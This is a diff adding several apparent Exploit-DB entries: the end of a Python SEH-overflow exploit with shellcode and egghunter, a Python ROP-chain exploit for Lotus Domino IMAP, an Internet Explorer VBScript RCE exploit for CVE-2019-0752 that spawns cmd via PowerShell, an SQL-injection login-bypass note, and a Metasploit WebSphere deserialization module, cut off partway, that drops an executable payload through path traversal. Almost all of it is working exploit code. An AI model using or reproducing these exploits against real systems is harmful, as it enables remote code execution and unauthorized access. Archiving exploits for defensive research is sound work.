+shellcode += "\x69\x57\x30\x38\x4b\x50\x74\x35\x58\x76\x55\x53"
+shellcode += "\x71\x6d\x6b\x48\x55\x6b\x73\x4d\x44\x64\x32\x55"
+shellcode += "\x4a\x44\x43\x68\x4c\x4b\x70\x58\x31\x34\x65\x51"
+shellcode += "\x4a\x73\x62\x46\x4e\x6b\x54\x4c\x52\x6b\x6e\x6b"
+shellcode += "\x33\x68\x37\x6c\x43\x31\x4b\x63\x6e\x6b\x34\x44"
+shellcode += "\x6c\x4b\x43\x31\x4a\x70\x4c\x49\x37\x34\x37\x54"
+shellcode += "\x44\x64\x51\x4b\x73\x6b\x53\x51\x52\x79\x52\x7a"
+shellcode += "\x42\x71\x6b\x4f\x69\x70\x71\x4f\x43\x6f\x32\x7a"
+shellcode += "\x4c\x4b\x37\x62\x7a\x4b\x4e\x6d\x71\x4d\x55\x38"
+shellcode += "\x56\x53\x70\x32\x77\x70\x65\x50\x62\x48\x44\x37"
+shellcode += "\x42\x53\x74\x72\x63\x6f\x43\x64\x33\x58\x42\x6c"
+shellcode += "\x63\x47\x31\x36\x54\x47\x6d\x59\x6b\x58\x69\x6f"
+shellcode += "\x4e\x30\x4e\x58\x4c\x50\x67\x71\x47\x70\x67\x70"
+shellcode += "\x37\x59\x4a\x64\x31\x44\x56\x30\x70\x68\x55\x79"
+shellcode += "\x4f\x70\x30\x6b\x63\x30\x6b\x4f\x68\x55\x61\x7a"
+shellcode += "\x35\x5a\x72\x48\x39\x50\x79\x38\x45\x51\x4f\x71"
+shellcode += "\x52\x48\x46\x62\x43\x30\x32\x36\x39\x39\x6c\x49"
+shellcode += "\x59\x76\x36\x30\x46\x30\x36\x30\x32\x70\x51\x50"
+shellcode += "\x36\x30\x67\x30\x76\x30\x32\x48\x6a\x4a\x56\x6f"
+shellcode += "\x79\x4f\x39\x70\x59\x6f\x79\x45\x5a\x37\x70\x6a"
+shellcode += "\x46\x70\x71\x46\x63\x67\x30\x68\x6e\x79\x69\x35"
+shellcode += "\x44\x34\x30\x61\x59\x6f\x59\x45\x6d\x55\x49\x50"
+shellcode += "\x53\x44\x55\x5a\x79\x6f\x30\x4e\x66\x68\x53\x45"
+shellcode += "\x6a\x4c\x6a\x48\x52\x47\x73\x30\x33\x30\x73\x30"
+shellcode += "\x61\x7a\x55\x50\x33\x5a\x67\x74\x71\x46\x66\x37"
+shellcode += "\x62\x48\x45\x52\x68\x59\x4f\x38\x51\x4f\x59\x6f"
+shellcode += "\x6b\x65\x4f\x73\x7a\x58\x53\x30\x63\x4e\x57\x46"
+shellcode += "\x4c\x4b\x35\x66\x32\x4a\x63\x70\x72\x48\x63\x30"
+shellcode += "\x76\x70\x65\x50\x77\x70\x73\x66\x62\x4a\x37\x70"
+shellcode += "\x32\x48\x46\x38\x4e\x44\x76\x33\x79\x75\x79\x6f"
+shellcode += "\x5a\x75\x6e\x73\x76\x33\x52\x4a\x73\x30\x76\x36"
+shellcode += "\x42\x73\x32\x77\x33\x58\x45\x52\x78\x59\x78\x48"
+shellcode += "\x61\x4f\x39\x6f\x59\x45\x4d\x53\x49\x68\x45\x50"
+shellcode += "\x73\x4d\x61\x38\x71\x48\x62\x48\x55\x50\x53\x70"
+shellcode += "\x35\x50\x53\x30\x33\x5a\x45\x50\x76\x30\x33\x58"
+shellcode += "\x56\x6b\x34\x6f\x46\x6f\x34\x70\x4b\x4f\x78\x55"
+shellcode += "\x71\x47\x75\x38\x31\x65\x70\x6e\x52\x6d\x50\x61"
+shellcode += "\x4b\x4f\x79\x45\x33\x6e\x31\x4e\x4b\x4f\x44\x4c"
+shellcode += "\x76\x44\x56\x6f\x4e\x65\x72\x50\x79\x6f\x69\x6f"
+shellcode += "\x6b\x4f\x68\x69\x4d\x4b\x79\x6f\x79\x6f\x49\x6f"
+shellcode += "\x56\x61\x5a\x63\x71\x39\x69\x56\x51\x65\x69\x51"
+shellcode += "\x4f\x33\x6d\x6b\x5a\x50\x68\x35\x4e\x42\x50\x56"
+shellcode += "\x52\x4a\x57\x70\x36\x33\x69\x6f\x5a\x75\x41\x41"
+
+egghunter ="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"+"SOUF"+"\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
+
+nseh_jmp = "\xeb\xaa"	#jmp back 84 bytes
+seh = "\x87\x1d\x40"	# (xiwin32.exe) 0x00401d87 -> pop/pop/ret. ( Parial Overwrite )
+
+payload = "A"*120
+payload += egghunter
+payload += "A"*(190-len(payload))
+payload += nseh_jmp
+payload += seh
+
+http_req = "GET / HTTP/1.1\r\n"
+http_req += "Host: "+ TCP_IP +"\r\n"
+http_req += "User-Agent: "+egg+nops+shellcode+"\r\n"
+http_req += "If-Modified-Since: Wed, " + payload + "\r\n\r\n"
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((TCP_IP, TCP_PORT))
+print "[+] Sending exploit payload..."
+s.send(http_req)
+s.close()
\ No newline at end of file
diff --git a/exploits/windows/remote/46808.py b/exploits/windows/remote/46808.py
new file mode 100755
index 000000000..9b838459c
--- /dev/null
+++ b/exploits/windows/remote/46808.py
@@ -0,0 +1,67 @@
+##########################################################
+#							  #
+# Here is a working version of the NSA's EMPHASISMINE     #
+# for IMAP Server Lotus Domino 8.5.3 FP0		  #
+#        DEP/ASLR bypass				  #
+#							  #
+# Replace breakpoints with msfvenom payload   		  #
+#	(ALPHANUMERIC)					  #
+# I love you Alison Thompson OAM @ThirdWaveORG            #
+# Author: Charles Truscott @r0ss1n1			  #
+#							  #
+###########################################################
+
+
+import base64
+import struct
+import socket
+import time
+
+rop_and_roll = struct.pack('<I', 0x00433212)  # POP ECX # RETN [nIMAP.EXE]
+rop_and_roll += struct.pack('<I', 0x41414141)  # Filler
+rop_and_roll += struct.pack('<I', 0x7c37a140)  # ptr to &VirtualProtect() [IAT MSVCR71.dll]
+rop_and_roll += struct.pack('<I', 0x60609925)  # MOV EAX,DWORD PTR DS:[ECX] # RETN [nnotes.dll]
+rop_and_roll += struct.pack('<I', 0x60b79a61)  # XCHG EAX,ESI # RETN [nnotes.dll]
+rop_and_roll += struct.pack('<I', 0x62450fc4)  # POP EBP # RETN [NLSCCSTR.DLL]
+rop_and_roll += struct.pack('<I', 0x7c345c30)  # & push esp # ret  [MSVCR71.dll]
+rop_and_roll += struct.pack('<I', 0x60165ba9)  # POP EBX # RETN [nnotes.dll]
+rop_and_roll += struct.pack('<I', 0x00000001)  # 0x00000001-> ebx
+rop_and_roll += struct.pack('<I', 0x6020962e)  # POP EDX # RETN [nnotes.dll]
+rop_and_roll += struct.pack('<I', 0x00001000)  # 0x00001000-> edx
+rop_and_roll += struct.pack('<I', 0x60e81a98)  # POP ECX # RETN [nnotes.dll]
+rop_and_roll += struct.pack('<I', 0x00000040)  # 0x00000040-> ecx
+rop_and_roll += struct.pack('<I', 0x606609f9)  # POP EDI # RETN [nnotes.dll]
+rop_and_roll += struct.pack('<I', 0x62136802)  # RETN (ROP NOP) [nxmlproc.dll]
+rop_and_roll += struct.pack('<I', 0x0042ba51)  # POP EAX # RETN [nIMAP.EXE]
+rop_and_roll += struct.pack('<I', 0x90909090)  # nop
+rop_and_roll += struct.pack('<I', 0x60505637)  # PUSHAD # RETN [nnotes.dll]
+
+
+username = "user"
+
+password = "pass"
+
+login=". LOGIN " + " " +  '"' + username + '"' +  " " + '"' +  password + '"' +  "\r\n"
+
+
+payload = "\x90" * 556 + rop_and_roll + "\x90" * 20 + "\xCC" * (1500 - 556 - len(rop_and_roll) - 20)
+encoded = base64.b64encode(payload)
+
+crash = ". EXAMINE " + "&" + encoded + "\x0d\x0a"
+
+print crash
+expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+expl.connect(('172.16.65.128', 143))
+time.sleep(3)
+connectionresponse = expl.recv(1024)
+print str(connectionresponse)
+print "sending LOGIN request"
+expl.send(login)
+loginresponse = expl.recv(1024)
+print str(loginresponse)
+print "sending EXAMINE request"
+print crash
+expl.send(crash)
+crashresponse = expl.recv(1024)
+print str(crashresponse)
+expl.close
\ No newline at end of file
diff --git a/exploits/windows/remote/46928.html b/exploits/windows/remote/46928.html
new file mode 100644
index 000000000..8d9519a69
--- /dev/null
+++ b/exploits/windows/remote/46928.html
@@ -0,0 +1,130 @@
+<!-- Full exploit of ZDI-19-359/ZDI-CAN-7757/CVE-2019-0752                                      -->
+<!-- Target: Internet Explorer, Windows 10 1809 17763.316 (Feb. 2019 patch level)               -->
+<!-- Vulnerability and original exploit technique by Simon Zuckerbraun (@HexKitchen), Mar. 2019 -->
+
+<!-- Tgroupcrew@gmail.com -->
+
+<!-- Demonstrates taking an arbitrary write primitive with no info leak, and using it to get    -->
+<!-- all the way to RCE using no shellcode.                                                     -->
+
+<!-- Note use of CVE-2019-0768 to get VBScript to run on IE/Win10.                              -->
+<!--    (h/t: James Forshaw, Google Project Zero)                                               -->
+
+<html>
+<meta http-equiv="x-ua-compatible" content="IE=8">
+<meta http-equiv="Expires" content="-1">
+<body>
+	<div id="container1" style="overflow:scroll; width: 10px">
+		<div id="content1" style="width:5000000px">
+			Content
+		</div>
+	</div>
+<script language="VBScript.Encode">
+Dim ar1(&h3000000)
+Dim ar2(1000)
+Dim gremlin
+addressOfGremlin = &h28281000
+Class MyClass
+	Private mValue
+	Public Property Let Value(v)
+		mValue = v
+	End Property
+	Public Default Property Get P
+		P = mValue				' Where to write
+	End Property
+End Class
+Sub TriggerWrite(where, val)
+	Dim v1
+	Set v1 = document.getElementById("container1")
+	v1.scrollLeft = val		' Write this value (Maximum: 0x001767dd)
+	Dim c
+	Set c = new MyClass
+	c.Value = where
+	Set v1.scrollLeft = c
+End Sub
+' Our vulnerability does not immediately give us an unrestricted
+' write (though we could manufacture one). For our purposes, the
+' following is sufficient. It writes an arbitrary DWORD to an
+' arbitrary location, and sets the subsequent 3 bytes to zero.
+Sub WriteInt32With3ByteZeroTrailer(addr, val)
+	TriggerWrite addr    , (val) AND &hff
+	TriggerWrite addr + 1, (val\&h100) AND &hff
+	TriggerWrite addr + 2, (val\&h10000) AND &hff
+	TriggerWrite addr + 3, (val\&h1000000) AND &hff
+End Sub
+Sub WriteAsciiStringWith4ByteZeroTrailer(addr, str)
+	For i = 0 To Len(str) - 1
+		TriggerWrite addr + i, Asc(Mid(str, i + 1, 1))
+	Next
+End Sub
+Function ReadInt32(addr)
+	WriteInt32With3ByteZeroTrailer addressOfGremlin + &h8, addr
+	ReadInt32 = ar1(gremlin)
+End Function
+Function LeakAddressOfObject(obj)
+	Set ar1(gremlin + 1) = obj
+	LeakAddressOfObject = ReadInt32(addressOfGremlin + &h18)
+End Function
+Sub Exploit()
+	' Corrupt vt of one array element (the "gremlin")
+	TriggerWrite addressOfGremlin, &h4003	' VT_BYREF | VT_I4
+	For i = ((addressOfGremlin - &h20) / &h10) Mod &h100 To UBound(ar1) Step &h100
+		If Not IsEmpty(ar1(i)) Then
+			gremlin = i
+			Exit For
+		End If
+	Next
+	
+	If IsEmpty(gremlin) Then
+		MsgBox "Could not find gremlin"
+		Exit Sub
+	End If
+	
+	For i = 0 To UBound(ar2)
+		Set ar2(i) = CreateObject("Scripting.Dictionary")
+	Next
+	
+	Set dict = ar2(UBound(ar2) / 2)
+	addressOfDict = LeakAddressOfObject(dict)
+	vtableOfDict = ReadInt32(addressOfDict)
+	scrrun = vtableOfDict - &h11fc
+	kernel32 = ReadInt32(scrrun + &h1f1a4) - &h23c90
+	winExec = kernel32 + &h5d380
+	
+	dict.Exists "dummy"		' Make a dispatch call, just to populate pld
+	' Relocate pld to ensure its address doesn't contain a null byte
+	pld = ReadInt32(addressOfDict + &h3c)
+	fakePld = &h28281020
+	For i = 0 To 3 - 1
+		WriteInt32With3ByteZeroTrailer fakePld + 4 * i, ReadInt32(pld + 4 * i)
+	Next
+	
+	fakeVtable = &h28282828		' ASCII "(((("
+	For i = 0 To 21
+		If i = 12 Then		' Dictionary.Exists
+			fptr = winExec
+		Else
+			fptr = ReadInt32(vtableOfDict + 4 * i)
+		End If
+		WriteInt32With3ByteZeroTrailer (fakeVtable + 4 * i), fptr
+	Next
+	
+	WriteAsciiStringWith4ByteZeroTrailer addressOfDict, "((((\..\PowerShell.ewe -Command ""<#AAAAAAAAAAAAAAAAAAAAAAAAA"
+	WriteInt32With3ByteZeroTrailer addressOfDict + &h3c, fakePld
+	WriteAsciiStringWith4ByteZeroTrailer addressOfDict + &h40, "#>$a = """"Start-Process cmd `""""""/t:4f /k whoami /user`"""""""""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"""
+	
+	On Error Resume Next
+	dict.Exists "dummy"		' Wheeee!!
+	
+	' A little cleanup to help prevent crashes after the exploit
+	For i = 1 To 3
+		WriteInt32With3ByteZeroTrailer addressOfDict + &h48 * i, vtableOfDict
+		WriteInt32With3ByteZeroTrailer addressOfDict + (&h48 * i) + &h14, 2
+	Next
+	Erase Dict
+	Erase ar2
+End Sub
+Exploit
+</script>
+</body>
+</html>
\ No newline at end of file
diff --git a/exploits/windows/remote/46934.txt b/exploits/windows/remote/46934.txt
new file mode 100644
index 000000000..7e6a2f996
--- /dev/null
+++ b/exploits/windows/remote/46934.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Petraware pTransformer ADC before 2.1.7.22827 allows SQL
+Injection via the User ID parameter to the login form.
+# Date: 28-05-2019
+# Exploit Author: Faudhzan Rahman
+# Website: https://faudhzanrahman.blogspot.com/
+# Vendor Homepage: http://www.petraware.com
+# Version: 2.0
+# CVE : CVE-2019-12372
+# Tested on: Windows 10 Pro
+
+*Description*
+
+The login form on pTransformer ADC does not filter dangerous character such
+as single quote ('). This has cause the application to be vulnerable to SQL
+Injection.
+
+*Proof-of-concept*
+
+The vulnerable parameter is User ID. By injecting ' or '1'='1'-- ,it will
+bypass the login form.
+
+*Reference*
+
+https://faudhzanrahman.blogspot.com/2019/05/sql-injection-on-login-form.html
\ No newline at end of file
diff --git a/exploits/windows/remote/46969.rb b/exploits/windows/remote/46969.rb
new file mode 100755
index 000000000..a7053bdd9
--- /dev/null
+++ b/exploits/windows/remote/46969.rb
@@ -0,0 +1,650 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'IBM Websphere Application Server Network Deployment Untrusted Data Deserialization Remote Code Execution',
+      'Description' => %(
+        This module exploits untrusted serialized data processed by the WAS DMGR Server and Cells.
+        NOTE: There is a required 2 minute timeout between attempts as the neighbor being added must be reset.
+      ),
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'b0yd' # @rwincey of [Securifera](https://www.securifera.com/) / Vulnerability Discovery and MSF module author
+        ],
+      'References' =>
+        [
+          ['CVE', '2019-8352'],
+          ['URL', 'https://www-01.ibm.com/support/docview.wss?uid=ibm10883628']
+        ],
+      'Platform' => ['win'],
+      'Targets' =>
+        [
+          [
+            'Windows Binary', {
+              'Arch'     => [ARCH_X86, ARCH_X64],
+              'Platform' => 'win'
+            }
+          ],
+          [
+            'CMD', {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'win',
+              'Payload' => {'Compat' => {'RequiredCmd' => 'generic'}}
+            }
+          ]
+        ],
+      'Privileged' => true,
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'May 15 2019'))
+
+    register_options(
+      [
+        Opt::RPORT(11006), # 11002,11004,11006,etc
+        OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]),
+        OptRaw.new('SSLVersion', [true, 'Default Version for WASND ', 'SSLv3']),
+        OptRaw.new('SSLVerifyMode', [true, 'SSL verification method', 'CLIENT_ONCE']),
+        OptString.new('SSLCipher', [true, 'SSL Cipher string ', 'ALL'])
+      ]
+    )
+  end
+
+  def cleanup
+    disconnect
+    print_status('Disconnected from IBM Websphere DMGR.')
+    super
+  end
+
+  def exploit
+    command = nil
+
+    if target.name == 'CMD'
+      fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") unless datastore['CMD']
+      command = datastore['CMD']
+    end
+    # Connect to IBM Websphere Application Server
+    connect
+    print_status("Connected to IBM WAS DMGR.")
+
+    node_port = datastore['RPORT']
+
+    # Send packet to add neighbor
+    enc_stream = construct_tcp_node_msg(node_port)
+    send_msg(enc_stream)
+
+    sock.get_once
+    print_status('Server responded')
+
+    # Generate binary name
+    bin_name = rand_text_alpha(8)
+
+    if command
+      command = datastore['CMD']
+      payload_contents = command.to_s
+      print_status('Executing command: ' + payload_contents)
+      bin_name << ".bat"
+    else
+      payload_contents = generate_payload_exe(code: payload.generate)
+      bin_name << ".exe"
+    end
+
+    print_status("Sending payload: #{bin_name}")
+    enc_stream = construct_bcast_task_msg(node_port, "..\\..\\..\\" + bin_name, payload_contents, bin_name)
+    send_msg(enc_stream)
+    register_file_for_cleanup(bin_name)
+  end
+
+  def send_msg(enc_stream)
+    pkt = [0x396fb74a].pack('N')
+    pkt += [enc_stream.length + 1].pack('N')
+    pkt += "\x00"
+    pkt += enc_stream
+
+    # Send msg
+    sock.put(pkt)
+  end
+
+  def construct_tcp_node_msg(node_port)
+    p2p_obj = Rex::Java::Serialization::Model::NewObject.new
+    p2p_obj.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
+    p2p_obj.class_desc.description = build_p2p_node_class(p2p_obj)
+
+    # Create the obj
+    object = Rex::Java::Serialization::Model::NewObject.new
+    object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
+    object.class_desc.description = build_tcp_node_msg(object, 12, "0.0.0.0", node_port, p2p_obj)
+
+    # Create the stream and add the object
+    stream = Rex::Java::Serialization::Model::Stream.new
+    stream.contents = []
+    stream.contents << object
+    stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
+    stream.contents << Rex::Java::Serialization::Model::NullReference.new
+    stream.encode
+  end
+
+  def construct_bcast_task_msg(node_port, filename, byte_str, cmd)
+    # Add upload file argument
+    byte_arr = byte_str.unpack("C*")
+    upfile_arg_obj = build_upfile_arg_class(filename, byte_arr, cmd)
+
+    # Create the obj
+    object = Rex::Java::Serialization::Model::NewObject.new
+    object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
+    object.class_desc.description = build_bcast_run_task_msg(object, 41, "0.0.0.0", node_port, upfile_arg_obj)
+
+    # Create the stream and add the object
+    stream = Rex::Java::Serialization::Model::Stream.new
+    stream.contents = []
+    stream.contents << object
+    stream.encode
+  end
+
+  def build_message(obj, msg_id, msg_type, orig_cell_field_type)
+    # Create the integer field and add the reference
+    id_field = Rex::Java::Serialization::Model::Field.new
+    id_field.type = 'int'
+    id_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'ID')
+
+    # Create the integer field and add the reference
+    type_field = Rex::Java::Serialization::Model::Field.new
+    type_field.type = 'int'
+    type_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'type')
+
+    # Create the object field and add the reference
+    new_field = Rex::Java::Serialization::Model::Field.new
+    new_field.type = 'object'
+    new_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'originatingCell')
+    new_field.field_type = orig_cell_field_type
+
+    # Create the class description
+    msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
+    msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.Message')
+    msg_class_desc.serial_version = 1
+    msg_class_desc.flags = 2
+    msg_class_desc.fields = []
+    msg_class_desc.fields << id_field
+    msg_class_desc.fields << type_field
+    msg_class_desc.fields << new_field
+
+    # Add annotations
+    msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
+    msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
+
+    # Add superclass
+    msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
+    msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
+
+    # Set the member values
+    obj.class_data << ['int', msg_id]
+    obj.class_data << ['int', msg_type]
+    obj.class_data << Rex::Java::Serialization::Model::NullReference.new
+
+    msg_class_desc
+  end
+
+  def build_bcast_flood_msg(obj, msg_type, source_ip, source_port)
+    prng = Random.new
+    msg_id = prng.rand(4294967295)
+
+    # Create the field ref
+    field_ref = Rex::Java::Serialization::Model::Reference.new
+    field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1
+
+    msg_obj = build_message(obj, msg_id, msg_type, field_ref)
+
+    # Create the integer field and add the reference
+    id_field = Rex::Java::Serialization::Model::Field.new
+    id_field.type = 'int'
+    id_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceMsgID')
+
+    # Create the integer field and add the reference
+    port_field = Rex::Java::Serialization::Model::Field.new
+    port_field.type = 'int'
+    port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceUdpPort')
+
+    # Create the object field and add the reference
+    ip_arr_field = Rex::Java::Serialization::Model::Field.new
+    ip_arr_field.type = 'array'
+    ip_arr_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceIP')
+    ip_arr_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, '[B')
+
+    # Create the class description
+    msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
+    msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.BcastFloodMsg')
+    msg_class_desc.serial_version = 1
+    msg_class_desc.flags = 2
+    msg_class_desc.fields = []
+    msg_class_desc.fields << id_field
+    msg_class_desc.fields << port_field
+    msg_class_desc.fields << ip_arr_field
+
+    # Add annotations
+    msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
+    msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
+
+    # Add superclass
+    msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
+    msg_class_desc.super_class.description = msg_obj
+
+    # Construct IP Array
+    ip_arr = source_ip.split(".").map(&:to_i)
+    builder = Rex::Java::Serialization::Builder.new
+    values_array = builder.new_array(
+      values_type: 'byte',
+      values: ip_arr,
+      name: '[B',
+      serial: 0x42acf317f8060854e0,
+      annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
+    )
+
+    # Set the member values
+    obj.class_data << ['int', msg_id]
+    obj.class_data << ['int', source_port]
+    obj.class_data << values_array
+
+    msg_class_desc
+  end
+
+  def build_tcp_node_msg(obj, msg_type, source_ip, source_port, p2p_obj)
+    prng = Random.new
+    msg_id = prng.rand(4294967295)
+
+    # Create the field type for the origCell
+    field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/lang/String;")
+    msg_obj = build_message(obj, msg_id, msg_type, field_type)
+
+    # Create the port field and add the reference
+    boot_time_field = Rex::Java::Serialization::Model::Field.new
+    boot_time_field.type = 'long'
+    boot_time_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'bootTime')
+
+    # Create the port field and add the reference
+    tcp_port_field = Rex::Java::Serialization::Model::Field.new
+    tcp_port_field.type = 'int'
+    tcp_port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'tcpPort')
+
+    # Create the port field and add the reference
+    udp_port_field = Rex::Java::Serialization::Model::Field.new
+    udp_port_field.type = 'int'
+    udp_port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'udpPort')
+
+    # Create the object field and add the reference
+    ip_arr_field = Rex::Java::Serialization::Model::Field.new
+    ip_arr_field.type = 'array'
+    ip_arr_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'ip')
+    ip_arr_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, '[B')
+
+    # Create the task object field and add field_type
+    node_prop_field = Rex::Java::Serialization::Model::Field.new
+    node_prop_field.type = 'object'
+    node_prop_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'nodeProperty')
+    node_prop_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Lcom/ibm/son/mesh/AppLevelNodeProperty;")
+
+    # Create the class description
+    msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
+    msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.TcpNodeMessage')
+    msg_class_desc.serial_version = 1
+    msg_class_desc.flags = 2
+    msg_class_desc.fields = []
+    msg_class_desc.fields << boot_time_field
+    msg_class_desc.fields << tcp_port_field
+    msg_class_desc.fields << udp_port_field
+    msg_class_desc.fields << ip_arr_field
+    msg_class_desc.fields << node_prop_field
+
+    # Add annotations
+    msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
+    msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
+
+    # Add superclass
+    msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
+    msg_class_desc.super_class.description = msg_obj
+
+    # Construct IP Array
+    ip_arr = source_ip.split(".").map(&:to_i)
+    builder = Rex::Java::Serialization::Builder.new
+    values_array = builder.new_array(
+      values_type: 'byte',
+      values: ip_arr,
+      name: '[B',
+      serial: 0x42acf317f8060854e0,
+      annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
+    )
+
+    # Set the member values
+    obj.class_data << ['long', 0]
+    obj.class_data << ['int', source_port]
+    obj.class_data << ['int', source_port]
+    obj.class_data << values_array
+    obj.class_data << p2p_obj
+
+    msg_class_desc
+  end
+
+  def build_app_node_class(obj)
+    # Create the structured gateway field and add the reference
+    struct_bool_field = Rex::Java::Serialization::Model::Field.new
+    struct_bool_field.type = 'boolean'
+    struct_bool_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'structuredGateway')
+
+    # Create the version field and add the reference
+    version_field = Rex::Java::Serialization::Model::Field.new
+    version_field.type = 'int'
+    version_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'version')
+
+    # Create the object field and add the reference
+    bridge_field = Rex::Java::Serialization::Model::Field.new
+    bridge_field.type = 'object'
+    bridge_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'bridgedCellsList')
+    bridge_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, 'Ljava/util/List;')
+
+    # Create the field ref
+    field_ref = Rex::Java::Serialization::Model::Reference.new
+    field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 4
+
+    # Create the cellname field and add the reference
+    cellname_field = Rex::Java::Serialization::Model::Field.new
+    cellname_field.type = 'object'
+    cellname_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'cellName')
+    cellname_field.field_type = field_ref
+
+    # Create the class description
+    msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
+    msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.AppLevelNodeProperty')
+    msg_class_desc.serial_version = 1
+    msg_class_desc.flags = 2
+    msg_class_desc.fields = []
+    msg_class_desc.fields << struct_bool_field
+    msg_class_desc.fields << version_field
+    msg_class_desc.fields << bridge_field
+    msg_class_desc.fields << cellname_field
+
+    # Add annotations
+    msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
+    msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
+
+    # Add superclass
+    msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
+    msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
+
+    # Set the member values
+    obj.class_data << ['boolean', 0]
+    obj.class_data << ['int', 0]
+    obj.class_data << Rex::Java::Serialization::Model::NullReference.new
+    obj.class_data << Rex::Java::Serialization::Model::Utf.new(nil, rand(0xffffffffffff).to_s) # Cell Name
+
+    msg_class_desc
+  end
+
+  def build_hashtable_class(obj)
+    # Create the integer field and add the reference
+    load_field = Rex::Java::Serialization::Model::Field.new
+    load_field.type = 'float'
+    load_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'loadFactor')
+
+    # Create the integer field and add the reference
+    threshold_field = Rex::Java::Serialization::Model::Field.new
+    threshold_field.type = 'int'
+    threshold_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'threshold')
+
+    # Create the class description
+    msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
+    msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'java.util.Hashtable')
+    msg_class_desc.serial_version = 0x13BB0F25214AE4B8
+    msg_class_desc.flags = 3
+    msg_class_desc.fields = []
+    msg_class_desc.fields << load_field
+    msg_class_desc.fields << threshold_field
+
+    # Add annotations
+    msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
+    msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
+
+    # Add superclass
+    msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
+    msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
+
+    obj.class_data << ['float', 0.75]
+    obj.class_data << ['int', 8]
+    obj.class_data << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00\x00\x00\x0b\x00\x00\x00\x03")
+
+    msg_class_desc
+  end
+
+  def build_properties_class
+    # Create the object
+    object = Rex::Java::Serialization::Model::NewObject.new
+    object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
+
+    msg_obj = build_hashtable_class(object)
+
+    # Create the field ref
+    field_ref = Rex::Java::Serialization::Model::Reference.new
+    field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 9
+
+    # Create the integer field and add the reference
+    defaults_field = Rex::Java::Serialization::Model::Field.new
